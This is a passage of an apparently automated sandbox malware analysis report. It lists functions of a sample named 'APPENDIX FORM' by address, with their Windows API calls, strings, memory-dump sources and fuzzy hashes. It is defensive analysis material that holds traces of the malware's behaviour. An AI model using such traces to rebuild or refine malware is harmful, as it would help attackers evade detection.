                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: freemallocmemcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 3056473165-0
                                                                                                              • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                              • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                              • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                              • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                              Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: d
                                                                                                              • API String ID: 0-2564639436
                                                                                                              • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                              • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                              • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                              • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                              Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset
                                                                                                              • String ID: BINARY
                                                                                                              • API String ID: 2221118986-907554435
                                                                                                              • Opcode ID: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                                                                              • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                              • Opcode Fuzzy Hash: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                                                                              • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                              Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcsicmp
                                                                                                              • String ID: /stext
                                                                                                              • API String ID: 2081463915-3817206916
                                                                                                              • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                              • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                              • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                              • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                              Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                              • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                              • String ID:
                                                                                                              • API String ID: 2445788494-0
                                                                                                              • Opcode ID: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                                                              • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                              • Opcode Fuzzy Hash: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                                                              • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                              Function 004152C7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: malloc
                                                                                                              • String ID: failed to allocate %u bytes of memory
                                                                                                              • API String ID: 2803490479-1168259600
                                                                                                              • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                              • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                                              • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                              • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                                                              Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0041BDDF
                                                                                                              • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcmpmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 1065087418-0
                                                                                                              • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                              • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                              • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                              • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                              Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                              • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                                              • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 1381354015-0
                                                                                                              • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                              • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                              • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                              • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                              Function 004300E8 Relevance: 2.6, APIs: 2, Instructions: 103COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004301AD
                                                                                                              • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpymemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 1297977491-0
                                                                                                              • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                              • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                              • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                              • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                              Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: free
                                                                                                              • String ID:
                                                                                                              • API String ID: 1294909896-0
                                                                                                              • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                              • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                              • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                              • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                              Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                              • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                              • String ID:
                                                                                                              • API String ID: 2154303073-0
                                                                                                              • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                              • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                              • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                              • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                              Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 3150196962-0
                                                                                                              • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                                              • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                              • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                                              • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                              Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$PointerRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 3154509469-0
                                                                                                              • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                              • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                              • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                              • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                              Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 4232544981-0
                                                                                                              • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                              • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                              • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                              • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                              Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeLibrary
                                                                                                              • String ID:
                                                                                                              • API String ID: 3664257935-0
                                                                                                              • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                              • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                              • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                              • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                              Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                              • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$FileModuleName
                                                                                                              • String ID:
                                                                                                              • API String ID: 3859505661-0
                                                                                                              • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                              • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                              • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                              • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                              Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
